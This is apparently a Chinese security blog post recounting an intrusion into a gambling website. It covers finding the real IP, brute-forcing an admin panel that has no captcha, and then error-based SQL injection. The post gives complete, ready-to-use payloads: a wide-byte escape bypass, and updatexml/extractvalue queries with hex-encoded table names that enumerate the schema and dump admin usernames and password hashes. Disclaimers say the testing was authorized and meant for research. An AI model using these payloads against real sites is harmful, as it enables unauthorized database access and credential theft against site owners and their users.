声明:请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。文章内的网站均已经过授权及备案,违法的事别干嗷
大家好,今天给大家分享的是sunwear某BC站
信息搜集到位
fofa和站长搜集到真实ip,后台地址
居然还没有验证码,这BC太草率了吧,估计要被老板打死了
直接爆破进入后台,管理的还挺多
嗯?没有会员数据
在后台打了半天 没getshell成功 换个思路 去前台看看
在登录接口尝试突破
可以看到这里单引号被添加了反斜杠转义并且没有将password带入一起查询,思路就是尝试宽字节注入,把反斜杠吞掉:
1%df'
应该是闭合成功了,但是仍然注不出数据来。好在天无绝人之路,发现另一个接口
这里也是加了反斜杠,但是它是数字型的,而且看到是用括号来闭合
没问题,成功闭合。我一开始是直接联合注入,得到列数为9
但是联合查询也注不出数据,无论怎么查都是不返回要查询的数据,请看
那就用报错注入来查?id=0)+and+updatexml(1,concat(0x7e,database(),0x7e),1)%23得到数据库是“niu”
查表,查列,dump数据就是简单的流程,直接给payload了,需要注意的是,这里表名一定要用HEX编码一下,不然会被转义,updatexml函数只会显示前32位,要获取完整的密码hash就要换个函数,用extractvalue
# 查表得到(admin,article,type,bank.....)?id=0)+and+updatexml(1,concat(0x7e,(select+group_concat(table_name)from+information_schema.tables+where+table_schema=database()),0x7e),1)+%23# 查列得到(id,account,password,identifier.....)?id=0)+and+updatexml(1,concat(0x7e,(select+group_concat(column_name)from+information_schema.columns+where+table_name=0x61646d696e),0x7e),1)%23# dump?id=0)+and+extractvalue(0x0a,concat(0x0a,(select+concat(account,0x3a,password)+from+niu.admin+limit+0,1)))%23
手工测试结束,为什么不用sqlmap呢,别急,我只是想复习复习手工注,最后用sqlmap跑一下
收工,交给蜀黍处理
站岗小狗,为您服务
原文始发于微信公众号(HexaGoners):BC网站SQL注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论